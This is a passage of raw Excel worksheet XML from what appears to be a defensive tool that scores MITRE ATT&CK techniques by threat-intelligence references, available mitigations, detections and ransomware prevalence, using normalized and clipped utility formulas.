        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J296">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K296">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L296">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M296" s="25">
        <v>0</v>
      </c>
      <c r="N296" s="51">
        <v>0</v>
      </c>
      <c r="O296" s="51">
        <v>0</v>
      </c>
      <c r="P296" s="51">
        <v>0</v>
      </c>
      <c r="Q296" s="51">
        <v>1</v>
      </c>
      <c r="R296" s="52" t="s">
        <v>288</v>
      </c>
      <c r="S296" s="51">
        <v>5</v>
      </c>
      <c r="T296" s="52" t="s">
        <v>289</v>
      </c>
      <c r="U296" s="51">
        <v>10</v>
      </c>
      <c r="V296" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14761904761904762</v>
      </c>
      <c r="W296">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X296">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y296">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z296">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA296">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB296">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC296" s="29" t="s">
        <v>496</v>
      </c>
      <c r="AD296" s="25" t="str" cm="1">
        <f t="array" ref="AD296">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC296)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE296" s="25">
        <f>IF(AD296="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF296" s="25" t="str" cm="1">
        <f t="array" ref="AF296">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC296)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG296" s="25">
        <f>IF(AF296="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH296" s="25" t="str" cm="1">
        <f t="array" ref="AH296">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC296)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI296" s="25">
        <f>IF(AH296="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ296" s="25" t="str" cm="1">
        <f t="array" ref="AJ296">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC296)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK296" s="25">
        <f>IF(AJ296="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL296" s="25" t="str" cm="1">
        <f t="array" ref="AL296">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC296)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM296" s="25">
        <f>IF(AL296="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN296" s="60">
        <v>0</v>
      </c>
      <c r="AO296" s="51">
        <v>0</v>
      </c>
      <c r="AP296" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.2370476190476198E-2</v>
      </c>
      <c r="AQ296" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.4568253968253992E-2</v>
      </c>
      <c r="AR296" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.4568253968253992E-2</v>
      </c>
      <c r="AS296" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT296" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU29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97" spans="1:47" ht="63.95">
      <c r="A297" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6283333333333336E-2</v>
      </c>
      <c r="B297" s="25">
        <f>SUM(H297,M297,V297)*(1+SUM(AE297,AG297,AI297,AK297,AM297))</f>
        <v>0.26283333333333336</v>
      </c>
      <c r="C297" s="25" t="s">
        <v>1234</v>
      </c>
      <c r="D297" s="25" t="s">
        <v>287</v>
      </c>
      <c r="E297" s="25" t="s">
        <v>1235</v>
      </c>
      <c r="F297" s="51">
        <v>1</v>
      </c>
      <c r="G297" s="51">
        <v>0</v>
      </c>
      <c r="H297" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I297">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J297">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K297">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L297">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M297" s="25">
        <v>0</v>
      </c>
      <c r="N297" s="51">
        <v>0</v>
      </c>
      <c r="O297" s="51">
        <v>1</v>
      </c>
      <c r="P297" s="51">
        <v>0</v>
      </c>
      <c r="Q297" s="51">
        <v>0</v>
      </c>
      <c r="R297" s="52" t="s">
        <v>288</v>
      </c>
      <c r="S297" s="51">
        <v>5</v>
      </c>
      <c r="T297" s="52" t="s">
        <v>289</v>
      </c>
      <c r="U297" s="51">
        <v>10</v>
      </c>
      <c r="V297" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14761904761904762</v>
      </c>
      <c r="W297">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X297">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y297">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z297">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA297">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB297">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC297" s="29" t="s">
        <v>102</v>
      </c>
      <c r="AD297" s="25" t="str" cm="1">
        <f t="array" ref="AD297">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC297)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE297" s="25">
        <f>IF(AD297="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF297" s="25" t="str" cm="1">
        <f t="array" ref="AF297">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC297)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG297" s="25">
        <f>IF(AF297="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH297" s="25" t="str" cm="1">
        <f t="array" ref="AH297">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC297)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI297" s="25">
        <f>IF(AH297="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ297" s="25" t="str" cm="1">
        <f t="array" ref="AJ297">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC297)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK297" s="25">
        <f>IF(AJ297="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL297" s="25" t="str" cm="1">
        <f t="array" ref="AL297">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC297)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM297" s="25">
        <f>IF(AL297="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN297" s="60">
        <v>0</v>
      </c>
      <c r="AO297" s="51">
        <v>0</v>
      </c>
      <c r="AP297" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6283333333333336E-2</v>
      </c>
      <c r="AQ297" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.7611111111111126E-2</v>
      </c>
      <c r="AR297" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.7611111111111126E-2</v>
      </c>
      <c r="AS297" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT297" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU29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98" spans="1:47" ht="63.95">
      <c r="A298" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6283333333333336E-2</v>
      </c>
      <c r="B298" s="25">
        <f>SUM(H298,M298,V298)*(1+SUM(AE298,AG298,AI298,AK298,AM298))</f>
        <v>0.26283333333333336</v>
      </c>
      <c r="C298" s="25" t="s">
        <v>1236</v>
      </c>
      <c r="D298" s="25" t="s">
        <v>287</v>
      </c>
      <c r="E298" s="25" t="s">
        <v>1237</v>
      </c>
      <c r="F298" s="51">
        <v>1</v>
      </c>
      <c r="G298" s="51">
        <v>0</v>
      </c>
      <c r="H298" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I298">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J298">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K298">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L298">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M298" s="25">
        <v>0</v>
      </c>
      <c r="N298" s="51">
        <v>0</v>
      </c>
      <c r="O298" s="51">
        <v>1</v>
      </c>
      <c r="P298" s="51">
        <v>0</v>
      </c>
      <c r="Q298" s="51">
        <v>0</v>
      </c>
      <c r="R298" s="52" t="s">
        <v>288</v>
      </c>
      <c r="S298" s="51">
        <v>5</v>
      </c>
      <c r="T298" s="52" t="s">
        <v>289</v>
      </c>
      <c r="U298" s="51">
        <v>10</v>
      </c>
      <c r="V298" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14761904761904762</v>
      </c>
      <c r="W298">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X298">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y298">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z298">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA298">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB298">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC298" s="29" t="s">
        <v>102</v>
      </c>
      <c r="AD298" s="25" t="str" cm="1">
        <f t="array" ref="AD298">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC298)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE298" s="25">
        <f>IF(AD298="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF298" s="25" t="str" cm="1">
        <f t="array" ref="AF298">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC298)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG298" s="25">
        <f>IF(AF298="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH298" s="25" t="str" cm="1">
        <f t="array" ref="AH298">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC298)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI298" s="25">
        <f>IF(AH298="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ298" s="25" t="str" cm="1">
        <f t="array" ref="AJ298">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC298)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK298" s="25">
        <f>IF(AJ298="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL298" s="25" t="str" cm="1">
        <f t="array" ref="AL298">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC298)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM298" s="25">
        <f>IF(AL298="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN298" s="52">
        <v>0</v>
      </c>
      <c r="AO298" s="51">
        <v>0</v>
      </c>
      <c r="AP298" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.6283333333333336E-2</v>
      </c>
      <c r="AQ298" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.7611111111111126E-2</v>
      </c>
      <c r="AR298" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.7611111111111126E-2</v>
      </c>
      <c r="AS298" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT298" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU29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299" spans="1:47" ht="48">
      <c r="A299" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.0824761904761909E-2</v>
      </c>
      <c r="B299" s="25">
        <f>SUM(H299,M299,V299)*(1+SUM(AE299,AG299,AI299,AK299,AM299))</f>
        <v>0.27491428571428572</v>
      </c>
      <c r="C299" s="25" t="s">
        <v>1238</v>
      </c>
      <c r="D299" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E299" s="25" t="s">
        <v>1239</v>
      </c>
      <c r="F299" s="51">
        <v>1</v>
      </c>
      <c r="G299" s="51">
        <v>1</v>
      </c>
      <c r="H299" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I299">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J299">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K299">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L299">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M299" s="25">
        <v>0</v>
      </c>
      <c r="N299" s="51">
        <v>0</v>
      </c>
      <c r="O299" s="51">
        <v>0</v>
      </c>
      <c r="P299" s="51">
        <v>0</v>
      </c>
      <c r="Q299" s="51">
        <v>6</v>
      </c>
      <c r="R299" s="52" t="s">
        <v>1240</v>
      </c>
      <c r="S299" s="51">
        <v>4</v>
      </c>
      <c r="T299" s="52" t="s">
        <v>1230</v>
      </c>
      <c r="U299" s="51">
        <v>8</v>
      </c>
      <c r="V299" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="W299">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X299">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y299">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Z299">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA299">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB299">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC299" s="29" t="s">
        <v>923</v>
      </c>
      <c r="AD299" s="25" t="str" cm="1">
        <f t="array" ref="AD299">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC299)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE299" s="25">
        <f>IF(AD299="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF299" s="25" t="str" cm="1">
        <f t="array" ref="AF299">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC299)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG299" s="25">
        <f>IF(AF299="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH299" s="25" t="str" cm="1">
        <f t="array" ref="AH299">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC299)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI299" s="25">
        <f>IF(AH299="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ299" s="25" t="str" cm="1">
        <f t="array" ref="AJ299">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC299)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK299" s="25">
        <f>IF(AJ299="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL299" s="25" t="str" cm="1">
        <f t="array" ref="AL299">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC299)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM299" s="25">
        <f>IF(AL299="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN299" s="52">
        <v>1</v>
      </c>
      <c r="AO299" s="51">
        <v>1</v>
      </c>
      <c r="AP299" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.0824761904761909E-2</v>
      </c>
      <c r="AQ299" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.1638095238095241E-2</v>
      </c>
      <c r="AR299" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.1638095238095241E-2</v>
      </c>
      <c r="AS299" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT299" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU29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00" spans="1:47">
      <c r="A300" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.2427619047619044E-2</v>
      </c>
      <c r="B300" s="25">
        <f>SUM(H300,M300,V300)*(1+SUM(AE300,AG300,AI300,AK300,AM300))</f>
        <v>0.29094285714285711</v>
      </c>
      <c r="C300" s="25" t="s">
        <v>1241</v>
      </c>
      <c r="D300" s="25" t="s">
        <v>279</v>
      </c>
      <c r="E300" s="25" t="s">
        <v>1242</v>
      </c>
      <c r="F300" s="51">
        <v>1</v>
      </c>
      <c r="G300" s="51">
        <v>1</v>
      </c>
      <c r="H300" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I300">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J300">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K300">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L300">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M300" s="25">
        <v>0</v>
      </c>
      <c r="N300" s="51">
        <v>1</v>
      </c>
      <c r="O300" s="51">
        <v>2</v>
      </c>
      <c r="P300" s="51">
        <v>0</v>
      </c>
      <c r="Q300" s="51">
        <v>3</v>
      </c>
      <c r="R300" s="52" t="s">
        <v>808</v>
      </c>
      <c r="S300" s="51">
        <v>7</v>
      </c>
      <c r="T300" s="51" t="s">
        <v>1243</v>
      </c>
      <c r="U300" s="51">
        <v>5</v>
      </c>
      <c r="V300" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="W300">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>12</v>
      </c>
      <c r="X300">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.21818181818181817</v>
      </c>
      <c r="Y300">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.21818181818181817</v>
      </c>
